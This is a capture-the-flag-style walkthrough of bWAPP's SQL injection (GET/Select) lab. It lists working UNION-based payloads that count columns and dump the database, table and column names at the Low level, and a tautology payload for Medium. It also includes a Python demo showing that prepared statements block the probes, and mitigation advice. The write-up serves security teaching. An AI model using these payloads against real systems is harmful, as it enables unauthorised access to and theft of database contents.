bWAPP - SQL Injection (GET/Select)

In this walkthrough, we go through the SQL Injection (GET/Select) vulnerability section of bWAPP Labs. We will explore and exploit SQL injection in a GET request driven by a select control and learn how applications are affected by it. So, let’s get started with the hacking without any delay.

Security: Low

  • Setting the security level to Low.

  • The application has a select control that lets the user pick a movie and displays information about it. As the Burp intercept shows, it issues a GET request to the sqli_2.php file, which in turn displays the output from the DB.

  • I appended an apostrophe (') to the end of the movie ID, which caused an error. That’s a good sign, as the parameter might be vulnerable to SQL injection.

'

  • I used the payload below, supplying an out-of-scope movie ID along with a TRUE statement, and got a positive response.

999+OR+1=1--+-

  • Next, I found the number of columns using the payloads below. For that, we used the ORDER BY clause: as we can see, we hit an “Unknown column” error on column 8 but no error on column 7. That means the query returns 7 columns.

1+ORDER+BY+10--+-
1+ORDER+BY+8--+-
1+ORDER+BY+7--+-

  • Let’s find out which column can be used to retrieve data. Here, the value placed in the second column got reflected in the front end.

999+UNION+SELECT+NULL,"asd",NULL,NULL,NULL,NULL,NULL--+-

  • Moving on, let’s dump the database name using the below payload.

999+UNION+SELECT+NULL,database(),NULL,NULL,NULL,NULL,NULL--+-

  • Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.

999+UNION+SELECT+NULL,table_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.tables+where+table_schema=database()--+-

  • We got a table named “blog”, nothing sensational but let’s still check the columns inside it with the below payload.

999+UNION+SELECT+NULL,column_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.columns+where+table_name='blog'--+-

  • Got an “id” column. On checking it, found nothing.

999+UNION+SELECT+NULL,id,NULL,NULL,NULL,NULL,NULL+from+blog--+-

Security: Medium

  • Setting the security level to Medium.

  • I used the payload below and it worked at the Medium level too, as we got a positive response.

9999+OR+1=1;

Security: High

  • Setting the security level to High.

  • I was unable to produce an error at the High level, as the application is using prepared statements.
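
The difference a prepared statement makes can be reproduced offline. The following is an added example, not code from bWAPP or from this walkthrough: it uses Python's sqlite3 as a stand-in database with a constructed 7-column movies table (the table, column names and rows are assumptions) and passes the URL-decoded probes from the Low level through a concatenated query and through a bound-parameter query.

```python
import sqlite3

# Constructed stand-in for the lab's movie table: SQLite instead of the
# lab's real database, with 7 columns to match the count found above.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, "
               "year TEXT, genre TEXT, hero TEXT, imdb TEXT, stock INTEGER)")
    db.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?,?)", [
        (1, "Movie A", "2001", "action", "A", "tt0000001", 10),
        (2, "Movie B", "2002", "drama", "B", "tt0000002", 20),
        (3, "Movie C", "2003", "sci-fi", "C", "tt0000003", 30),
    ])
    return db

def lookup_concatenated(db, movie):
    """Vulnerable pattern: the parameter becomes part of the SQL text."""
    return db.execute("SELECT * FROM movies WHERE id = " + movie).fetchall()

def lookup_prepared(db, movie):
    """Prepared statement: the parameter is bound as a value, never parsed."""
    return db.execute("SELECT * FROM movies WHERE id = ?", (movie,)).fetchall()

def outcome(fn, db, movie):
    """Summarise a lookup as 'N row(s)' or 'SQL error' for comparison."""
    try:
        return f"{len(fn(db, movie))} row(s)"
    except sqlite3.Error:
        return "SQL error"

# URL-decoded forms of the probes used at the Low level above.
PROBES = ["1", "1'", "999 OR 1=1-- -", "1 ORDER BY 8-- -", "1 ORDER BY 7-- -"]

def compare():
    db = make_db()
    return {p: (outcome(lookup_concatenated, db, p),
                outcome(lookup_prepared, db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (concat, prepared) in compare().items():
        print(f"{probe!r:22} concatenated={concat:10} prepared={prepared}")
```

With the bound parameter, every probe other than a plain ID returns no rows and raises no database error, which matches the behaviour observed at the High level.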

Conclusion:

So, we have finally completed all the security levels for the bWAPP SQL Injection (GET/Select) vulnerability. We looked at how the application is set up at each level and how the security controls implemented can be bypassed. SQL injection attacks can be mitigated by performing input sanitization and by using prepared statements or parameterized queries for every SQL query the application makes to the database. On that note, I will take my leave and will meet you in the next one with another bWAPP vulnerability writeup. Till then, “Keep Hacking”.
